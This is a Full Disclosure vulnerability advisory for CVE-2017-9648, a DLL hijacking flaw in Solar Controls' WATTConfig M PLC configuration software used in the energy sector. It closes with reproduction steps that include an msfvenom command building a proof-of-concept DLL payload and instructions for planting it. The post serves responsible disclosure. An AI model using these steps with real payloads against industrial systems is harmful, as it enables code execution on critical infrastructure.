Vendor: Solar Controls Equipment: WATTConfig M Software Vulnerability: Uncontrolled Search Path Element
Advisory URL: https://ipositivesecurity.com/2017/09/01/ics-solar-controls-wattconfig-m-software-insecure-library-loading-allows-code-execution/ ICS-CERT Advisory https://ics-cert.us-cert.gov/advisories/ICSA-17-222-03 ------------------------ AFFECTED PRODUCTS ------------------------ The following versions of Solar Controls’ WATTConfig M Software for Windows 2.5.10 for M SSR/MAX PLCs are affected: WATTConfig M Software, Version 2.5.10.1 and prior. ------------------------ BACKGROUND ------------------------ Critical Infrastructure Sector(s): Energy Countries/Areas Deployed: Unknown Company Headquarters Location: Czech Republic ------------------------ IMPACT ------------------------ Successful exploitation of this vulnerability may allow arbitrary code execution. ------------------------ VULNERABILITY OVERVIEW ------------------------ UNCONTROLLED SEARCH PATH ELEMENT CWE-427 An uncontrolled search path element has been identified, which could allow an attacker to execute arbitrary code on a target system using a malicious DLL file. CVE-2017-9648 has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). ------------------------ Missing Libraries ------------------------ ftd2xx.dll ------------------------ Application Executables (that look for missing DLL) ------------------------ WattConfigM.exe ------------------------ Steps to reproduce ------------------------ 1. Generate a dll payload msfvenom –p windows/exec cmd=calc.exe –f dll –o ftd2xx.dll 2. Place this dll in any directory defined in the PATH environment variable C:\app-folder-RW\ 3. Run WattConfigM.exe -> calc.exe executes +++++ Best Regards, Karn Ganeshen _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/